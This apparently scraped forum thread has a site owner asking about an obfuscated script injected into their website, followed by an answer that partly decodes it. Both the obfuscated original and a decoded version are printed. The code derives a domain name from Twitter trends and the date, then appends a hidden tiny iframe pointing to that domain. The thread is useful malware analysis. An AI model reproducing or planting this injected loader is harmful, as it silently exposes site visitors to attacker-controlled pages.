Menu
<script>
(function($$) {
d = "(@(){ %H=@( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=@( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`;':2345678901,'/':48271,'F':198195254,'G':12,'CX='};@ #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\\ #p(#M)}Pj=document;#d=window; (C='undefined'; (S=VhaDWDosestnsdlDjfqcq' 6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery ;try{Pn=$ }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr'),#n(\"hxDgakDosxsLsJseD6sJDmDj\"));PS.appendChild(#m)}@ PH(#q,PB){\\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\\(#N%#s) 7t(#k){ (N=V;')+#k; !D=V/'); !v=V;')-VF'); !m=PH( !v, !D); !T= !v% !D 7p(P){\\ P /==1?P[0]:P 3'')};@ #e(P){d=new Date( 6D=Vzee');d.setTime((P.as_of-VG')*VG')*VG')*Vezz -*Vezzz -;\\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}@ PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){\\ String.fromCharCode(i+x+24)});\\ #p(PN) 7o($){if &)!= (C){$(@(){if &.Ph)!= (C)\\;$.Ph=1; 2S,@(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n(\"ETzeeu\")+#K+\"-\"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez'); ) 2u,@(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz'),+Vee - 0Pu ,u 0Pd ,d; 4u+V,')] 0!#b) 4d+V,')];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'safetynet').split('' 6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh')+#p(#b).substring(0,#a)+'.com/'+PJ($);Pr['Z']=#g;Pf=VBI 1biMU 1UkrZRiMRIA');$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} *)()#js@functionP#AV#n('X':'`','~.getUTC\\return .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(@(){ *#o(#d.jQuery)} +){var ,<#L)Pu=Vz')+P -')) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}@ # 8+(+Ve -;P";
for (c = 50; c; d = (t = d.split('#@PVX`~\\ ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8'.substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
$$(d)
})(function(jsAP) {
return (function(jsA, jsAg) {
return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
})((function(jsA) {
return jsA.constructor
}), (function(jsA) {
return (function(jsAg) {
return jsA.call(jsA, jsAg)
})
}))
});
</script>
My host is saying nothing about this and it is happening frequently. I think they might be hiding a malicious hacking attempt.
What does this do?
EDIT:
We're changing hosts.
The code is indeed malicious and was injected into our website. Our host was trying to conceal that (probably so that we wouldn't worry)
This happened to my friend's website on the same host.
Don't test out this script, please.
Looks like some obfuscated injection.
309
Let's work and decipher this; it'll be fun(-nish).
AFAICT so far it's grabbing (what seems to be) the third trend for two days prior to the current date, or at least was meant to (I think the date key it's using to look up a day's trends is incorrect, because it's adding a zero-seconds thing onto the time, which isn't present in the feed), building a URL from that, and sending some data keyed on a hash representing the nearest 6-hr interval.
Here's the blob of text decoded after decoding along with the start of analysis:
(function () {
jsAr = { }; // Here only for a subsequent set of jsAr['Z'] later, which may not be necessary.
/* Returns either first element of jsA, or a joined string. */
function firstElementOrJoined(jsA) {
return jsA.length == 1 ? jsA[0] : jsA.join('')
};
jsAj = document;
loadJquery(); // Load JQ in head new script tag.
function divideAndFloor(jsq, jsAB) {
return Math.floor(jsq / jsAB)
}
function jsx(jss) {
var jsAC = divideAndFloor(jsN, jsAm);
var jsF = jsN % jsAm;
var jsf = (jsAD * jsF) - (jsAT * jsAC);
if (jsf > 0) {
jsN = jsf
} else {
jsN = jsf + jsAv
}
return (jsN % jss)
}
/** Used only once in .getJSON call. */
function jst(jsk) {
jsN = 2345678901 + jsk;
jsAD = 48271;
jsAv = 2147483647;
jsAm = divideAndFloor(jsAv, jsAD);
jsAT = jsAv % jsAD
}
/** Takes twitter as_of and subtracts ~2 days. */
function jse(jsA) {
d = new Date();
d.setTime((jsA.as_of - 172800) * '1000');
return d
}
function jsz(jsAz) {
var jsc, jsAL, jsj = jsAz.length;
var jsv = [];
while (--jsj) {
jsAL = jsx(jsj);
jsv.push(jsAL);
jsc = jsAz[jsAL];
jsAz[jsAL] = jsAz[jsj];
jsAz[jsj] = jsc
}
}
function jso($) {
// Wait until we have jQuery loaded.
if (typeof($) == 'undefined') {
setTimeout(function () { jso(jQuery) }, 1222);
return;
}
$(function () {
// Only run this function once (there's a timeout inside).
if (typeof ($.jsAh) != 'undefined') return;
$.jsAh = 1;
$.getJSON('http://api.twitter.com/1/trends/daily.json?callback=?', function (data) {
dateTwoDaysPrior = jse(data);
nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
urlTwitterTwoDaysAgo = 'http://api.twitter.com/1/trends/daily.json?callback=?&date=2011-' + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;
twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
jsAd = twoDigitPrevSixHr + 1;
// Run JSON request every second.
setTimeout(function () {
$.getJSON(urlTwitterTwoDaysAgo, function (data) {
try {
jsy = data.trends;
for (jsr in jsy) {
break;
}
jsr = jsr.substr(0, 11); // == 2011-11-10
if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr = '0' + twoDigitPrevSixHr; // Normalize to hh
if (jsAd < 10) twoDigitPrevSixHr = '0' + jsAd; // Normalize to hh
// Try to get trends for last 6hr thing (but the :00 will make it never work?)
// If can't, try to get the next 6hr thing.
jsb = jsy[jsr + twoDigitPrevSixHr + ':00'];
if (!jsb) jsb = jsy[jsr + jsAd + ':00'];
// Get third trend entry, e.g.,
// {
// "name": "#sinterklaasintocht",
// "query": "#sinterklaasintocht",
// "promoted_content": null,
// "events": null
// }
// and strip out non-chars from name, add safetynet, and convert to array
// ['s', 'i', etc... nterklaasintochtsafetynet]
jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi, '') + 'safetynet').split('');
// 803 + prevSixHr * 3 + 410; -- some sort of hash?
hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
jst(hashkeyForTwoDaysAgoPrevSixHr);
jsa = jsx(4) + 10;
jsz(jsb);
// Are these two lines useful? Neither jsAr['Z'] nor jsg are referenced.
// jsb = ['s', 'i', etc... nterklaasintochtsafetynet]
jsg = '=http://' + firstElementOrJoined(jsb).substring(0, jsa) + '.com/index.php?tp=001e4bb7b4d7333d';
jsAr['Z'] = jsg;
//
jsAf = '<divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div>';
$('body').append(jsAf)
} catch (jsAy) {}
})
}, 1000)
})
});
}
jso(jQuery)
})();
Here's some URLs constructed from the array:
jsd.jsS = http://api.twitter.com/1/trends/daily.json?callback=?
This chunk of code:
jsAS = jsAj.getElementsByTagName(jsn('Y'))[0];
jsm = jsAj.createElement(jsn('kS'));
jsm.setAttribute(jsn('kr'), jsn("hxDgakDosxsLsJseD6sJDmDj"));
jsAS.appendChild(jsm)
appends the jquery script tag to <head>:
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
